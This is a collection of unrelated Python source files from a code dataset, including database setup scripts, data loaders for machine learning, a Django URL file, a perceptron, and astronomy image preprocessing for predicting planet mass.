*\nimport os\nimport pandas as pd\nimport argparse\n\n\"\"\"\nUsage: python SingleRun.py [-h] [--delay delay] models [models ...]\n\nmodels reside in the models directory, so something like models/Team13Pricer.py\n\nIf your plot looks funny, try increasing the delay in the market: --delay=0.1\n\n\"\"\"\n\ngameParameters = {\"seed\" : 932748239, \"quotewidth\" : 0.3, \"delay\" : 0.001, \"steps\" : 200}\nimport sys\nfrom models import *\n\nif __name__=='__main__':\n\n parser = argparse.ArgumentParser(description='List of Models')\n parser.add_argument('models', metavar='models', nargs='+',\n help='a list of models to run')\n parser.add_argument('--delay', metavar='delay', type=float, help='delay in seconds')\n parser.add_argument('--seed', metavar='seed', type=int, help='seed for rng')\n\n args = parser.parse_args()\n\n if args.delay:\n gameParameters['delay'] = args.delay\n if args.seed:\n gameParameters['seed'] = args.seed\n\n # compatibility python2/3\n try:\n input = raw_input\n except NameError:\n pass\n\n\n models = []\n for model in args.models:\n bn =os.path.basename(model)\n if not bn.endswith(\".py\"):\n print(\"Error %s is not a python file\"%bb)\n sys.exit(-1)\n module = sys.modules[\"models.%s\"%bn[:-3]]\n models.append(getattr(module, \"pricer\"))\n\n game = TradingGame(gameParameters)\n game.run(models)\n fout = open(\"events\", \"w\")\n fout.write(\"%s\"%game.getEvents())\n fout.close()\n pp = EventPlot(game)\n pp.plot()\n print(game.ranking())\n input(\"Any key to close plot\")\n pp.close()\n sys.exit(0)\n","sub_path":"BlackScholes_pricer/SingleRun.py","file_name":"SingleRun.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"38566780","text":"# Despite the title we can run this script as often or as little as we want :)\nimport rethinkdb as r\nfrom cfapi import get_all_organizations, get_organization_projects\nfrom os import environ\n\n\ndef re_create_db_and_tables(conn, db_name, table_names):\n drop_db_if_exists(conn, db_name)\n\n r.db_create(db_name).run(conn)\n\n # We build up the object by continuosly calling table_create on it.\n for table_name in table_names:\n r.db(db_name).table_create(table_name).run(conn)\n\n return\n\n\ndef drop_db_if_exists(conn, db_name):\n try:\n r.db_drop(db_name).run(conn)\n except r.RqlRuntimeError:\n # Thrown if database doesn't exists, do nothing\n pass\n\n\ndef main():\n table_names = [\"organizations\", \"projects\"]\n db_name = \"cfa_raw\"\n\n # Connect to RethinkDB host bound to RETHINKDB_IP or default to \"localhost\"\n conn = r.connect(host=environ.get(\"RETHINKDB_IP\", \"localhost\"))\n\n re_create_db_and_tables(conn, db_name, table_names)\n\n organizations = get_all_organizations()\n organizations_projects = {organization[\"name\"]: get_organization_projects(organization[\"all_projects\"])\n for organization in organizations}\n\n # Add name as an element in the array so it will be inserted with each document\n for org_name, projects in organizations_projects.iteritems():\n for project in projects:\n project[\"organization_name\"] = org_name\n\n r.db(\"cfa_raw\").table(\"organizations\").insert(organizations).run(conn)\n # Insert every project as a separate document into the \"projects\" table\n # (we can get back to it with the \"organization_name\" property\n for projects in organizations_projects.values():\n r.db(\"cfa_raw\").table(\"projects\").insert(projects).run(conn)\n\n\n# If we run this module as a script, it deletes and rebuilds the RethinkDB\n# db and then re-fetches the data using the Code For America api\n# (http://codeforamerica.org/api/)\nif __name__ == '__main__':\n main()\n","sub_path":"brigadepulse/drop_and_reload_brigade_data.py","file_name":"drop_and_reload_brigade_data.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358034168","text":"def numberOfWaysToMakeChange(n, denoms):\n ways = [0 if i > 0 else 1 for i in range(n +1)]\n for i in denoms:\n for j in range(n + 1):\n if i <= j:\n ways[j] = ways[j] + ways[j - i]\n return ways[len(ways) - 1]\n\n\nprint(numberOfWaysToMakeChange(25, [1, 5, 10, 25]))\n","sub_path":"oldCodes/numberOfWaysToMakeChange.py","file_name":"numberOfWaysToMakeChange.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"200129134","text":"from django.urls import path, include\nfrom django.contrib import admin\nfrom . import views\n\napp_name = 'user'\nurlpatterns = [\n path('', views.index, name='index'),\n path('profile/', views.profile, name='browseotherprofile'),\n path('profile/', views.own_profile, name='browseownprofile'),\n path('signup/', views.signup_view, name=\"signup\"),\n path('login/', views.login_view, name='login'),\n path('review/', views.review, name='review'),\n path('edit_profile/', views.editprofile, name='editprofile'),\n path('logout/', views.userlogout, name=\"logout\"),\n # anyone with access to the link can leave a review - Implement something else with checkout.\n]\n","sub_path":"hellgames/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"26879931","text":"import multiprocessing\nimport functools\nimport re\nimport tensorflow as tf\nfrom tensorflow.python.data import Dataset\nfrom inhousednn.data_loader.loader import Loader, split_by_chunk_num, split_by_chunk_size\nfrom collections import defaultdict\n\nLINE_BATCH_SIZE = 50000\nMAX_SENT_LEN = 100\nMAX_WORD_LEN = 25\n\n\nclass BIOLoader(Loader):\n def __init__(self, train=None, dev=None, test=None):\n super(BIOLoader, self).__init__(train, dev, test)\n\n def generate_idx_mapping(self, zeros=False, lower=False):\n def read_in_batches(file_object, batch_size=LINE_BATCH_SIZE):\n \"\"\"Lazy function (generator) to read a file piece by piece.\n Default batch size: 1k.\"\"\"\n while True:\n data = file_object.read(batch_size)\n if not data:\n break\n yield data\n\n def gen_freq_dict(file_path):\n if not file_path:\n return {}\n word_freq_dict = defaultdict(int)\n char_freq_dict = defaultdict(int)\n label_freq_dict = defaultdict(int)\n with open(file_path) as f:\n for batch in read_in_batches(f):\n with multiprocessing.Pool(\n processes=multiprocessing.cpu_count()\n ) as p:\n chunks = split_by_chunk_num(batch,\n multiprocessing.cpu_count())\n partial_gen_mapping_thread = functools.partial(\n gen_mapping_thread, zeros=zeros, lower=lower)\n pool_result = p.map_async(\n partial_gen_mapping_thread, chunks\n )\n for dico in pool_result.get():\n for k, v in dico[0].items():\n word_freq_dict[k] += v\n for k, v in dico[1].items():\n char_freq_dict[k] += v\n for k, v in dico[2].items():\n label_freq_dict[k] += v\n return word_freq_dict, char_freq_dict, label_freq_dict\n\n #\n # generate frequency dicts\n #\n train_freq_dict = gen_freq_dict(self.train)\n dev_freq_dict = gen_freq_dict(self.dev)\n test_freq_dict = gen_freq_dict(self.test)\n\n # merge frequency dicts\n word_freq_dict = train_freq_dict[0]\n char_freq_dict = train_freq_dict[1]\n label_freq_dict = train_freq_dict[2]\n for d in [dev_freq_dict, test_freq_dict]:\n for k, v in d[0].items():\n word_freq_dict[k] += v\n for k, v in d[1].items():\n char_freq_dict[k] += v\n for k, v in d[2].items():\n label_freq_dict[k] += v\n\n # add unk and padding to word and char dict\n word_freq_dict[''] = 10000001\n word_freq_dict[''] = 10000000\n char_freq_dict[''] = 10000001\n char_freq_dict[''] = 10000000\n\n #\n # create mapping\n #\n word_to_id, id_to_word = create_mapping(word_freq_dict)\n char_to_id, id_to_char = create_mapping(char_freq_dict)\n\n return word_to_id, id_to_word, char_to_id, id_to_char\n\n @staticmethod\n def extract(file_path):\n batch = []\n with open(file_path) as f:\n for line in f:\n line = line.strip()\n if not line and len(batch) > LINE_BATCH_SIZE:\n yield batch\n batch.clear()\n else:\n batch.append(line)\n # yield the last batch\n yield batch\n\n @staticmethod\n def transform(extract_generator, word_to_id, char_to_id, label_to_id):\n for batch in extract_generator:\n instances = filter(lambda x: not x.strip(),\n '\\n'.join(batch).split('\\n\\n'))\n # batch_word_idx = []\n # batch_char_idx = []\n # batch_label_idx = []\n for sent in instances:\n items = [line.split(' ') for line in sent.splitlines()]\n words = [item[0] for item in items[:MAX_SENT_LEN]]\n chars = [list(w)[:MAX_WORD_LEN] for w in words]\n labels = [item[-1] for item in items]\n\n words_idx = [word_to_id[w] for w in words]\n char_idx = [[char_to_id[c] for c in w] for w in chars]\n labels_idx = [label_to_id[l] for l in labels]\n\n # batch_word_idx.append(words_idx)\n # batch_char_idx.append(char_idx)\n # batch_label_idx.append(labels_idx)\n\n yield words_idx, char_idx, labels_idx\n\n @staticmethod\n def load(transform_generator, model_batch_size):\n dataset = Dataset.from_generator(transform_generator,\n (tf.int64, tf.int64, tf.int64))\n batch_dataset = dataset.batch(model_batch_size)\n\n batch_dataset = batch_dataset.prefetch(buffer_size=50)\n\n return batch_dataset\n\n # for batch in transform_generator:\n # batch_word_idx, batch_char_idx, batch_label_idx = batch\n # model_batches = split_by_chunk_size(batch, model_batch_size)\n #\n # for b in model_batches:\n\n\n\n\ndef gen_mapping_thread(chunk, zeros=False, lower=False):\n word_freq_dict = defaultdict(int)\n char_freq_dict = defaultdict(int)\n label_freq_dict = defaultdict(int)\n for item in chunk:\n item = item.strip().split(' ')\n if not item:\n continue\n word = item[0]\n\n if zeros:\n word = zero_digits(word)\n if lower:\n word = word.lower()\n chars = list(word)\n\n word_freq_dict[word] += 1\n for c in chars:\n char_freq_dict[c] += 1\n\n label = item[-1]\n label_freq_dict[label] += 1\n\n return word_freq_dict, char_freq_dict, label_freq_dict\n\n\ndef zero_digits(s):\n \"\"\"\n Replace every digit in a string by a zero.\n \"\"\"\n return re.sub('\\d', '0', s)\n\n\ndef create_mapping(dico):\n \"\"\"\n Create a mapping (item to ID / ID to item) from a dictionary.\n Items are ordered by decreasing frequency.\n \"\"\"\n sorted_items = sorted(dico.items(), key=lambda x: (-x[1], x[0]))\n id_to_item = {i: v[0] for i, v in enumerate(sorted_items)}\n item_to_id = {v: k for k, v in id_to_item.items()}\n return item_to_id, id_to_item\n","sub_path":"inhousednn/task/sequence_labeling/BIOLoader.py","file_name":"BIOLoader.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"142372268","text":"import pymysql\n\ndef server_phthon_database():\n db = pymysql.connect(\"localhost\", \"root\", \"123456\",\n \"python_manito\", charset=\"utf8\")\n cur = db.cursor()\n cur.execute(\"create table usermsg(\\\n username char(20),\\\n passwd char(20),\\\n time char(30),\\\n score int)default charset=utf8;\")\n cur.execute(\"create table test_table(\\\n testid int auto_increment,\\\n username varchar(20),\\\n time char(30),\\\n title varchar(50),\\\n test varchar(15000),\\\n reading int default 0,\\\n upvote int default 0,\\\n upnames varchar(1000) default '',\\\n primary key(testid))auto_increment=1 \\\n default charset=utf8;\")\n cur.execute(\"create table reply_table(\\\n t_id int,\\\n postname varchar(20),\\\n floor int default 0,\\\n reply varchar(5000) default '',\\\n foreign key(t_id) references test_table(testid)\\\n on delete cascade \\\n on update cascade)default charset=utf8;\")\n cur.execute(\"create table temporary(\\\n ntid int auto_increment,\\\n username varchar(20),\\\n time char(30),\\\n title varchar(50),\\\n test varchar(15000),\\\n primary key(ntid))auto_increment=1 \\\n default charset=utf8;\")\n PATH = './'\n with open(PATH+'usermsg', 'rt') as fu:\n while True:\n m = fu.readline()\n m = m.strip()\n if not m:\n break\n l = m.split(',')\n s = \"insert into usermsg values('%s','%s','%s',%d);\"\\\n % (l[0], str(l[1]), str(l[2]),int(l[3]))\n cur.execute(s)\n with open(PATH+'tieba', 'rt') as ft:\n count = 0\n while True:\n count += 1\n m = ft.readline()\n m = m.strip()\n if not m:\n break\n l = m.split(',')\n with open(PATH+'post/'+l[3], 'rt') as fs:\n t = fs.read()\n s = \"insert into test_table values(%d,'%s','%s','%s','%s',%d,%d,'%s');\"\\\n % (int(l[0]), str(l[1]), str(l[2]), str(l[3]), t, int(l[5]), \\\n int(l[6]), str(l[7]))\n cur.execute(s)\n rs1='''\\n[1楼]:感谢老天啊,终于抢到一楼了,哈哈哈...\nlaoyu 2017-03-20-10:31:35\\n\n[2楼]:额滴神哪,抢个一楼高兴成这样,没见过世面.能不能关注重点,这是python社区。\nxixi 2017-03-20-14:13:26\\n\\n'''\n sql=\"insert into reply_table value(1,'%s',2,'%s');\"%('~python简介~.txt',rs1)\n cur.execute(sql)\n rs2='''\\n[1楼]:这是哪啊,好安静,谁能告诉我python是个啥?\nlulu 2017-04-21-11:26:33\\n\n[2楼]:问我吗,我也不知道,上电梯时一群人把我推进了电梯,莫名其秒来到了7楼达内,看来这辈子要和python结缘了。\nshock 2017-04-22-16:21:56\\n\\n'''\n sql=\"insert into reply_table value(2,'%s',2,'%s');\"%('~python为什么这么火~.txt',rs2)\n db.commit()\n print('python大神贴吧已建立!')\n cur.close()\n db.close()\n\nserver_phthon_database()\n","sub_path":"project_v1.5/sql&server/create_postbar/createpost.py","file_name":"createpost.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"111037228","text":"'''\nCreated on Nov 20, 2014\n\n@author: noampeled\n'''\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\nfrom sklearn.feature_selection import SelectKBest, f_classif\n\n\nclass ChannelsSelector(SelectKBest):\n\n def __init__(self, k):\n super(ChannelsSelector, self).__init__(f_classif, k=k)\n\n def fit(self, X, y):\n self.T = X.shape[1]\n y = yTile(y, self.T)\n X = preReshape(X)\n return SelectKBest.fit(self, X, y)\n\n def transform(self, X):\n X = preReshape(X)\n X = SelectKBest.transform(self, X)\n X = postReshape(X, self.T, self.k)\n return X\n\n def fit_transform(self, X, y):\n self.T = X.shape[1]\n y = np.tile(y, (self.T, 1)).T.reshape(-1)\n X = preReshape(X)\n SelectKBest.fit(self, X, y)\n X = SelectKBest.transform(self, X)\n X = postReshape(X, self.T, self.k)\n return X\n\n\nclass ChannelsSelector2():\n\n def __init__(self, k, kTime=20):\n # Take best kTime points in the time domain\n self.selector = SelectKBest(f_classif, k=kTime)\n self.k = k\n\n def fit(self, X, y, doPrint=False):\n C = X.shape[2]\n self.selectors = [None] * C\n self.scores = np.zeros(C)\n for c in range(C):\n if (doPrint):\n print('sensor {}'.format(c))\n model = self.selector.fit(X[:, :, c], y)\n scores = model.scores_[model._get_support_mask()]\n self.scores[c] = np.mean(scores)\n self.channelsIndices = np.argsort(self.scores)[::-1][:self.k]\n\n def transform(self, X):\n return X[:, :, self.channelsIndices]\n\n def fit_transform(self, X, y):\n self.fit(X, y)\n return self.transform(X)\n\n\nclass ChannelsPCA(PCA):\n\n def fit(self, X, y=None):\n self.T = X.shape[1]\n X = preReshape(X)\n # normalize the data\n self.scaler = preprocessing.StandardScaler().fit(X)\n X = self.scaler.transform(X)\n PCA.fit(self, X)\n self.printExplainedVar()\n return self\n\n def transform(self, X):\n X = preReshape(X)\n X = self.scaler.transform(X)\n X = PCA.transform(self, X)\n X = postReshape(X, self.T, self.n_components)\n# print(X.shape)\n return X\n\n def fit_transform(self, X, y=None):\n self.T = X.shape[1]\n X = preReshape(X)\n # normalize the data\n self.scaler = preprocessing.StandardScaler().fit(X)\n X = self.scaler.transform(X)\n self.printExplainedVar()\n # Fit and transform\n PCA.fit(self, X, y)\n X = PCA.transform(self, X)\n self.printExplainedVar()\n X = postReshape(X, self.T, self.n_components)\n return X\n\n def printExplainedVar(self):\n pass\n# print ('explained variance ratio (first %d components): %.2f'%(\n# self.n_components, sum(self.explained_variance_ratio_)))\n\n\ndef preReshape(X):\n N, T, C = X.shape\n return X.reshape((N * T, C))\n\n\ndef postReshape(X, T, k):\n N = X.shape[0] / T\n X = X.reshape((N, T, k))\n return X\n\n\ndef yTile(y, T):\n return np.tile(y, (T, 1)).T.reshape(-1)\n","sub_path":"src/commons/selectors/channelsSelector.py","file_name":"channelsSelector.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"404731297","text":"# -*- coding: utf-8 -*-\n\nfrom south.db import db\nfrom django.db import models\n\nclass Migration:\n\n def forwards(self):\n # Adding field 'UserAccess.selector'\n ManagedObjectSelector=db.mock_model(model_name=\"ManagedObjectSelector\",db_table=\"sa_managedobjectselector\")\n db.create_table('sa_managedobjectselectorbyattribute', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('selector', models.ForeignKey(ManagedObjectSelector,verbose_name=\"Object Selector\")),\n ('key_re', models.CharField(\"Filter by key (REGEXP)\", max_length=256)),\n ('value_re', models.CharField(\"Filter by value (REGEXP)\", max_length=256))\n ))\n\n def backwards(self):\n # Deleting field 'UserAccess.selector'\n db.delete_table('sa_managedobjectselectorbyattribute')\n\n","sub_path":"sa/migrations/0033_selector_by_attribute.py","file_name":"0033_selector_by_attribute.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"530287689","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\n\n\"\"\"\nPlot the top-weighted features for classifcation.\n\"\"\"\n\n\ndef plot_coefficients(classifier, model_name, feature_set, feature_names, top_features=20):\n if top_features > len(feature_names):\n top_features = len(feature_names)\n\n coef = classifier.coef_.ravel()\n\n top_positive_coefficients = np.argsort(coef)[-top_features:]\n top_negative_coefficients = np.argsort(coef)[:top_features]\n top_coefficients = np.hstack([top_negative_coefficients, top_positive_coefficients])\n\n # create plot\n plt.figure(figsize=(15, 7))\n colors = ['crimson' if c < 0 else 'forestgreen' for c in coef[top_coefficients]]\n plt.bar(np.arange(2 * top_features), coef[top_coefficients], color=colors)\n feature_names = np.array(feature_names)\n ax = plt.gca()\n ax.set_facecolor('whitesmoke')\n plt.xticks(np.arange(1, 1 + 2 * top_features), feature_names[top_coefficients], rotation=60, ha='right')\n plt.savefig('./output/svm_' + feature_set + '_top_features.png', bbox_inches='tight')\n plt.show()\n\n\nfeature_set = 'STRUCT'\n\npath = './output/SVM_clf_30d_' + feature_set + '_args_for_coeff_mapping.pickle'\n\nargs = pickle.load(open(path, 'rb'))\n\nfeature_set = args['feature_set']\nfeature_names = args['feature_names']\nmodel_name = args['model_name']\nclf = args['clf']\n\nplot_coefficients(clf, model_name, feature_set, feature_names, top_features=20)","sub_path":"plot_coeffs.py","file_name":"plot_coeffs.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6879213","text":"import numpy as np\n\n\ndef activation(x, deriv=False):\n \"\"\" Sigmoid \"\"\"\n if deriv:\n return activation(x) * (1 - activation(x))\n return 1 / (1 + np.exp(-x))\n\n\ndef loss_fn(y, y_h):\n \"\"\" Cross-Entropy \"\"\"\n return -y_h * np.log(y) - (1 - y_h) * np.log(1 - y)\n\n\ndef output_layer_deriv(y_h, y):\n return (y - y_h)\n\n\ndef hidden_layer_deriv():\n return None\n\n\nclass Perceptron(object):\n\n def __init__(self, num_layers, weights, biases, learning_rate):\n self._weights = weights\n self._biases = biases\n self.num_layers = num_layers\n self.eta = learning_rate\n\n def fit(self, x, y_h):\n for j in range(200000):\n for i in range(len(x)):\n y = self.forward(x[i])\n loss = loss_fn(y, y_h[i])\n self.backward(y_h[i], y, x[i])\n # print('loss:{}'.format(loss))\n\n if j % 10000 == 0:\n print(loss)\n\n def forward(self, x):\n # y = {0: x}\n # z = {}\n for layer in range(0, self.num_layers - 1):\n if layer == 0:\n z = x\n y = np.dot(self._weights, z) + self._biases\n z = activation(y)\n # print('layer:{} y:{} z:{}'.format(layer, y, z))\n return z\n\n def backward(self, y_h, y, x):\n dw = output_layer_deriv(y_h, y) * x\n db = output_layer_deriv(y_h, y)\n self._weights -= self.eta * dw\n self._biases -= self.eta * db\n # print(self._weights, self._biases)\n return None\n\n def predict(self, x):\n for i in range(len(x)):\n print(x[i], self.forward(x[i]))\n\n\nif __name__ == '__main__':\n\n x = np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1],\n [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1]])\n y_h = np.array([0, 0, 0, 0,\n 0, 0, 0, 1]).reshape((8, 1))\n weights = [0.5 - np.random.rand(), 0.5 - np.random.rand(),\n 0.5 - np.random.rand()]\n biases = [0.5 - np.random.rand()]\n # print('weights:{}\\nbiases:{}'.format(weights, biases))\n model = Perceptron(2, weights, biases, learning_rate=0.1)\n model.fit(x, y_h)\n model.predict(x)\n","sub_path":"Perceptron.py","file_name":"Perceptron.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"448427611","text":"# import the necessary packages\n\nimport pandas as pd\nimport numpy as np\nimport glob\nimport cv2\nimport os\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras as k\nprint(\"We are currently using the Modules_DPCNet\")\n\n\n\ndef parse_dataset(dataset_path, filtering=True):\n '''\n Input : Address to the data folder\n Outpur : Return a csv with parameter data and path to the image\n\n '''\n\n dataset = load_csv(dataset_path, filtering=filtering)\n images = []\n for i in dataset[\"Sample#\"]:\n imagePath = os.path.sep.join([dataset_path, \"Disk_dust_plots/dust1_gap_{}.jpg\".format(i)])\n images.append(imagePath)\n dataset[\"file\"] = images\n return dataset\n\n\ndef load_csv(folder_address, filtering=True):\n\n dataset0 = pd.concat(map(pd.read_csv, glob.glob(folder_address + '*.csv')), ignore_index=True)\n\n ################## DATA Filtering #############\n if filtering is True:\n\n # Filtering 1\n dataset0 = dataset0[dataset0['Dust_gap_1'] > 0.05] # filtering out very narrow gaps\n dataset = pd.concat([dataset0], ignore_index=True).sort_index() # important when merging multiple datasets\n # df = shuffle(dataset)\n # dataset = df.reset_index(drop=True)\n dataset['Planet_Mass'] = dataset['Planet_Mass'] / (3 * 10**-6) # writing in unit of earth mass\n\n # Filtering 2 (removing simualation with more than two gaps)\n dataset = dataset[dataset['#_DG'] < 2] # keeping one and two dust gap disks\n # dataset_filtered = dataset.drop(columns=['Sample#']) # dropping the Sample#\n\n # dataset_filtered.to_csv('data_folder/dataset_filered.csv') # saving the filtered data as csv file for future reference\n dataset = dataset.drop(columns=['Gas_gap_1', 'Dust_depth_1', 'Dust_gap_1', 'Dust_gap_2', 'Dust_depth_2', 'Gas_depth_1', '#_DG', '#_GG']) # droping the unimportant columns\n # dataset.to_csv('../data_folder/dataset_filered.csv')\n # dataset = dataset[['Sample#','Planet_Mass']] # droping the unimportant columns\n # dataset = dataset.sort_values(by=\"Sample#\")\n\n ## cleaning the data##\n dataset.isna().sum() # summing the number of na\n dataset0 = dataset.dropna()\n\n return dataset0\n\n\ndef parse_time_series_data(folder_addrss, list_of_orbits,path, data_filters=True):\n\n ''' Input : Address to the data folder and ahte orbits\n Output : Return a conacted csv with parameter data and path to the image with parse_dataset function\n '''\n dataset_complete = []\n # appended_data = []\n print(\"[INFO] preparing the dataframe from differnt times...\")\n for i in range(len(list_of_orbits)):\n\n folder_address = folder_addrss + list_of_orbits[i] + '/'\n\n print(\"Reading the image paths and data from folder:\", folder_address)\n # Loading the dataset for a given orbit\n dataset = parse_dataset(folder_address)\n\n # Appending the data from the pandas dataframe for each orbits\n dataset_complete.append(dataset)\n print(\"[INFO] The concatination of dataframes from differnt times are now complete\")\n dataset_complete = pd.concat(dataset_complete, ignore_index=True, axis=0)\n dataset_complete.to_csv(path+'data_folder/dataset_complete.csv') # saving as dataset_complete.csv\n return dataset_complete\n\n\ndef process_the_disk_attributes(train, test, path):\n\n ''' Input : train or test dataset\n path : to store the stats file\n Output : Return normalized data z normalization is used\n '''\n\n print(\"[INFO] preparing the normalized data training/testing split...\")\n try: \n train = train.drop(columns=['Sample#', 'file']) ## dropping the necessary files\n test = test.drop(columns=['Sample#', 'file']) ## dropping the necessary files\n except KeyError :\n pass\n \n train_stats = train.describe()\n train_stats.pop(\"Planet_Mass\")\n train_stats = train_stats.transpose()\n\n train_stats.to_csv(path+'data_folder/train_stats.csv')\n\n ## The labels are not normalized\n train_labels = train.pop(\"Planet_Mass\")\n test_labels = test.pop(\"Planet_Mass\")\n\n\n def norm(x):\n return (x - train_stats['mean']) / train_stats['std']\n normed_train_data = norm(train)\n\n normed_test_data = norm(test)\n# print(normed_train_data)\n print(\"[INFO] Done...\")\n return normed_train_data, normed_test_data, train_labels, test_labels\n\ndef process_data_for_test(test, path):\n\n ''' \n ### ADDED ON 7 JANUARY TO TEST DPCNET ON HIGH MASS DATA####\n\n Input : CSV containing data and path to the image\n path : to get the stat files from the original trained data\n Output : Return normalized data (z normalization is used)\n '''\n\n print(\"[INFO] preparing the normalized data TEST...\")\n try: \n # train = train.drop(columns=['Sample#', 'file']) ## dropping the necessary files\n test = test.drop(columns=['Sample#', 'file']) ## dropping the necessary files\n except KeyError :\n pass\n \n \n\n train_stats = pd.read_csv(path+'data_folder/train_stats.csv',index_col=0)\n # print(train_stats)\n ## The labels are not normalized\n \n test_labels = test.pop(\"Planet_Mass\")\n\n\n def norm(x):\n return (x - train_stats['mean']) / train_stats['std']\n \n\n normed_test_data = norm(test)\n# print(normed_train_data)\n print(\"[INFO] Done...\")\n return normed_test_data, test_labels\n\n\n\ndef load_disk_images(dataset, X_res, Y_res, Type):\n\n ''' Input : dataset with path to the images \n Output : Images set for either test or train\n '''\n\n print(\"[INFO] Loading images from {} data..\".format(Type))\n images = []\n for image_path in dataset[\"file\"]: \n\n # dimensions for cropping the image\n left = 44\n top = 44\n right = 556\n bottom = 556 \n ## read the image corresponding to the path\n try:\n imagePath = image_path ## for regular code \n # imagePath = '..'+image_path[33:] ## when reading path from the ones gnerated in COLAB as the address in COLAB gets modified\n image = cv2.imread(imagePath) \n crop_image = image[left:right, top:bottom]\n except TypeError:\n print(\"you may need to specify the correct path to the images\")\n imagePath = '..'+image_path[33:] ## when reading path from the ones gnerated in COLAB as the address in COLAB gets modified\n image = cv2.imread(imagePath) \n crop_image = image[left:right, top:bottom]\n \n crop_image = image[left:right, top:bottom]\n\n crop_image = cv2.resize(crop_image, (X_res, Y_res)) # downsizing the image\n # crop_image = crop_image/255.0 # scaling\n\n ## ADDED for image normalization (standadization) on 31 Jan 2021\n crop_image = k.preprocessing.image.img_to_array(crop_image) ## changing to numpy array\n datagen = k.preprocessing.image.ImageDataGenerator(samplewise_center=True, samplewise_std_normalization=True,rescale= 1.0/255.0)\n crop_image = datagen.standardize(np.copy(crop_image))\n images.append(crop_image)\n print(\"{} Images are loaded\".format(Type))\n return np.array(images)\n\n\n\n\ndef plot_history(history, path, Model,Network= None,res =None):\n try:\n hist = pd.DataFrame(history.history) ## is the data asalready a dataframe no need to convert\n path1 = path+'figures'\n except AttributeError:\n hist = history\n path1 = path+'figures_paper'\n hist['epoch'] = hist.index\n print(path1)\n plt.figure(figsize=(5, 5))\n plt.xlabel('Epoch')\n plt.ylabel('Mean Abs Error ($M_\\oplus$)')\n plt.plot(hist['epoch'], hist['mean_absolute_error'],\n label='Train ')\n plt.plot(hist['epoch'], hist['val_mean_absolute_error'],\n label='Val Error')\n plt.ylim([0, 30])\n plt.legend()\n \n if Model == 'CNN':\n plt.title(\"Single-input DPCNet\")\n if Network == None:\n plt.savefig(path1+'/MAEvalidation_loss_CNN.pdf', format='pdf', dpi=300)\n else:\n plt.savefig(path1+'/MAEvalidation_loss_{}_{}.pdf'.format(Network,str(res)), format='pdf', dpi=300)\n else:\n plt.title(\"Multi-input DPCNet\")\n if Network == None:\n plt.savefig(path1+'/MAEvalidation_loss_hybrid.pdf', format='pdf', dpi=300)\n else:\n plt.savefig(path1+'/MAEvalidation_loss_{}_{}_hybrid.pdf'.format(Network,str(res)), format='pdf', dpi=300)\n # plt.savefig(path1+'/MAEvalidation_loss_Hybrid.pdf', format='pdf', dpi=300)\n\n plt.figure(figsize=(5, 5))\n plt.xlabel('Epoch')\n plt.ylabel('Mean Square Error ($M_\\oplus^2$)')\n plt.plot(hist['epoch'], hist['mean_squared_error'],\n label='Train')\n plt.plot(hist['epoch'], hist['val_mean_squared_error'],\n label='Validation ')\n plt.ylim([0, 600])\n # plt.xlim([0,700])\n # plt.yscale(\"log\")\n plt.legend()\n plt.tick_params(labelsize=10)\n plt.tick_params(axis='both', which='major', length=6, width=2)\n plt.tick_params(axis='both', which='minor', length=3, width=1.3)\n plt.tight_layout()\n if Model == 'CNN':\n plt.title(\"Single-input DPCNet\")\n if Network == None:\n plt.savefig(path1+'/MSEvalidation_loss_CNN.pdf', format='pdf', dpi=300)\n else:\n plt.savefig(path1+'/MSEvalidation_loss_{}_{}.pdf'.format(Network,str(res)), format='pdf', dpi=300)\n # plt.savefig(path1+'/MSEvalidation_loss_CNN.pdf', format='pdf', dpi=300) \n else:\n plt.title(\"Multi-input DPCNet\")\n if Network == None:\n plt.savefig(path1+'/MSEvalidation_loss_hybrid.pdf', format='pdf', dpi=300)\n else:\n plt.savefig(path1+'/MSEvalidation_loss_{}_{}_hybrid.pdf'.format(Network,str(res)), format='pdf', dpi=300)\n #plt.savefig(path1+'/MSEvalidation_loss_Hybrid.pdf', format='pdf', dpi=300)\n\n plt.show()\n\n","sub_path":"MODULES_DPCNeT/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":9892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"272105243","text":"######################################################\r\n# This program is to provide the player with a title screen\r\n# The Start game button starts the Main_Game program\r\n# The Go to Scoreboard button starts the Score_Board program\r\n######################################################\r\n\r\nfrom Tkinter import *\r\n\r\nclass StartPage(Frame):\r\n def __init(self, parent):\r\n Frame.__init__(self, parent)\r\n self.test = True\r\n\r\n\r\n def startMain_Game(self):\r\n self.test = False\r\n\r\n def startScore_Board(self):\r\n pass\r\n\r\n test = True\r\n\r\n def setup(self):\r\n TITLE_FONT = (\"Helvetica\", 18, \"bold\")\r\n LARGE_FONT = (\"Verdana\", 12)\r\n\r\n 